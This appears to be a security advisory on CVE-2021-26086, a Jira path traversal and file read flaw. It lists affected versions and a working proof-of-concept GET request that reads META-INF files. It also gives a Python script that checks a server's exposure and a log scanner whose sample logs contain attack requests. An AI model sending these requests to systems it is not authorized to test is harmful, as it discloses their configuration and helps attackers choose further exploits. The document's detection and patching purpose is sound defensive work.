Atlassian has released an advisory for a newly identified path traversal and limited file read vulnerability, CVE-2021-26086, in Jira Server and Jira Data Center.
Jira Software is a proprietary issue tracking product developed by Atlassian that allows bug tracking and agile project management.
This vulnerability is being actively exploited in the wild and affects multiple release lines of the software.
Atlassian has fixed CVE-2021-26086 in Jira versions 8.5.14, 8.13.6 and 8.16.1; later releases such as 8.17.0 also contain the fix.
The flaw is a read primitive: an unauthenticated remote attacker can retrieve particular files from the web application's /WEB-INF/ and /META-INF/ directories, such as the Maven pom.properties that records the exact build version. That information discloses deployment details and lets an attacker fingerprint the instance precisely and select further exploits against it.
Atlassian Jira is one of the most widely used ticketing tools in organizations around the world. CVE-2021-26086 is present in the following versions of Atlassian Jira Server and Data Center:
All versions before 8.5.14
All versions from 8.6.0 up to, but not including, 8.13.6
All versions from 8.14.0 up to, but not including, 8.16.1
The vulnerability allows a remote attacker to read particular files via a path traversal into the /WEB-INF/ and /META-INF/ directories of the Jira web application.
The ease of exploitation is alarming: a single unauthenticated GET request to the /s/ static resource servlet, with a ';' path parameter inserted before the target path, is enough to disclose the file.
Successful exploitation discloses the deployment descriptor, build metadata and configuration files bundled inside the web application.
Proof of Concept (POC)
The Proof of Concept (POC) for this vulnerability is a GET request whose path, after the ';' path parameter, resolves into /META-INF/ and returns the Maven pom.properties of the Jira web application. The request is:
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
The execution of this request, along with the endpoint being used, is shown in the image below.
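The following script, added here as an example and not taken from the advisory or from Atlassian, turns the PoC request above into a version check. It sends the same path, parses the returned pom.properties, and compares the version against the affected ranges listed in this advisory. A patched server answers the ';' path with an error page, so a genuine pom.properties in the response is itself evidence of exposure. The function names and the sample response are constructed for the example; only the request path and the version ranges come from the page.

```python
"""Check a Jira Server/Data Center instance for CVE-2021-26086 exposure.

Added example for this advisory; not Atlassian's code and not the advisory's
own tooling. It reuses the request path shown above and the fixed versions
listed in the advisory. Everything else (function names, the sample
response) is constructed here.
"""
import re
import sys
import urllib.request
from typing import Dict, Optional

# Request path from the PoC: the ';' starts a path parameter, which lets the
# /s/ static-resource servlet resolve the remainder into /META-INF/.
POC_PATH = "/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"

# Affected ranges from the advisory: [lower, upper) with upper = fixed release.
AFFECTED_RANGES = [
    ((0, 0, 0), (8, 5, 14)),
    ((8, 6, 0), (8, 13, 6)),
    ((8, 14, 0), (8, 16, 1)),
]

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[tuple]:
    """'8.13.5' or '8.13.5-SNAPSHOT' -> (8, 13, 5); None if unparseable."""
    m = VERSION_RE.match(text.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version: str) -> Optional[bool]:
    """True if the version falls in an affected range, False if fixed, None if unknown."""
    v = parse_version(version)
    if v is None:
        return None
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def parse_properties(body: str) -> Dict[str, str]:
    """Minimal Java .properties parser: key=value lines, '#' and '!' comments."""
    props = {}
    for line in body.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        if "=" in line:
            k, _, v = line.partition("=")
            props[k.strip()] = v.strip()
    return props


def assess(body: str) -> dict:
    """Decide from a response body whether the file leaked and what it says."""
    props = parse_properties(body)
    leaked = props.get("groupId") == "com.atlassian.jira" and "version" in props
    version = props.get("version") if leaked else None
    return {
        "leaked": leaked,
        "version": version,
        "affected": is_affected(version) if version else None,
    }


def fetch(base_url: str, timeout: float = 10.0) -> str:
    """GET the PoC path; returns the body, or '' on any HTTP/network error."""
    req = urllib.request.Request(base_url.rstrip("/") + POC_PATH,
                                 headers={"User-Agent": "cve-2021-26086-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return ""


# Constructed sample of what a vulnerable 8.13.5 instance would return.
SAMPLE_RESPONSE = """#Generated by Maven
#Thu Feb 11 10:00:00 UTC 2021
version=8.13.5
groupId=com.atlassian.jira
artifactId=jira-webapp-dist
"""

if __name__ == "__main__":
    # Usage: python check.py https://jira.example.com  (no argument: sample only)
    body = fetch(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RESPONSE
    print(assess(body))
```

Only run fetch against systems you are authorized to test; the parsing and range logic can be exercised offline with the embedded sample.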
Impact & Mitigation
A remote attacker can read files from the META-INF and WEB-INF directories of the Jira web application, which are normally unreachable from the browser.
These directories hold the deployment descriptor, bundled configuration and build metadata (for example the Maven pom.properties with the exact Jira version), all of which the attacker can read.
A remote attacker can use that information to fingerprint the instance precisely and chain the flaw with other vulnerabilities or misconfigurations that apply to that version.
The vulnerability itself only reads files and offers no way to write data to the server, so it does not by itself yield remote code execution (RCE); a log poisoning attack would need a write path plus execution of the written content, which this flaw does not provide. Any RCE would have to come from chaining with a separate vulnerability.
Where such a chain exists, RCE allows attackers to take control of the target system and even deploy ransomware on it.
Initial access to an internet-facing Jira server may then enable lateral movement across the internal network.
Nation-state actors leverage zero-day vulnerabilities to compromise information, while ransomware groups use such vulnerabilities to extort money by encrypting user data.
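Because a patched server still logs the attempts, the request pattern is easy to hunt for in access logs. The script below is an added detection example, not the advisory's or Atlassian's own tooling: it scans reverse-proxy access log lines for the ';' path parameter trick resolving into /WEB-INF/ or /META-INF/, percent-decodes up to twice to catch %3B and %253B, and grades each hit by whether the server actually returned the file (200) or blocked it. The log format, field names and sample lines are constructed for the example.

```python
"""Flag CVE-2021-26086-style requests in web access logs.

Added detection example for this advisory (not Atlassian's or the advisory's
own code). Log format, field names and the sample lines are constructed here;
the path pattern is the one used by the PoC above: a ';' path parameter in a
request that resolves into /WEB-INF/ or /META-INF/.
"""
import re
from urllib.parse import unquote
from typing import List, Optional

# Apache/nginx "combined" style line as a reverse proxy in front of Jira writes it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
SENSITIVE_DIR = re.compile(r"/(?:WEB-INF|META-INF)/", re.IGNORECASE)


def normalize(path: str) -> str:
    """Drop the query string and percent-decode up to twice (%3B, %253B -> ';')."""
    path = path.split("?", 1)[0]
    for _ in range(2):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line: str) -> Optional[dict]:
    """Return a finding for a suspicious request, or None for a normal one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = normalize(m.group("path"))
    if not SENSITIVE_DIR.search(path):
        return None
    has_param = ";" in path          # the path-parameter traversal trick itself
    served = m.group("status") == "200"
    if has_param and served:
        verdict = "confirmed-read"   # server handed over the protected file
    elif has_param:
        verdict = "probe"            # attempt was blocked or server is patched
    else:
        verdict = "suspicious"       # direct /WEB-INF/ request, normally a 404
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "status": m.group("status"), "verdict": verdict}


def scan(lines: List[str]) -> List[dict]:
    """Classify every line and keep only the findings, in log order."""
    return [f for f in map(classify, lines) if f]


# Constructed sample log: a normal page view, a legitimate static resource,
# the PoC request succeeding, and a percent-encoded probe answered with 404.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Aug/2021:10:15:30 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Aug/2021:10:15:31 +0000] "GET /s/d41d8cd98f00b204e9800998ecf8427e/_/download/resources/jira.webresources:global-static/global.css HTTP/1.1" 200 40321 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Aug/2021:10:15:32 +0000] "GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 200 213 "-" "curl/7.68.0"
203.0.113.5 - - [12/Aug/2021:10:15:33 +0000] "GET /s/a/_/%3B/WEB-INF/web.xml HTTP/1.1" 404 0 "-" "curl/7.68.0"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A "confirmed-read" hit against an unpatched host should be treated as a disclosure of the build version and deployment descriptor, and the source address correlated with any later authentication or exploitation attempts.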
Immediately update the Jira Software to any of the following patched versions: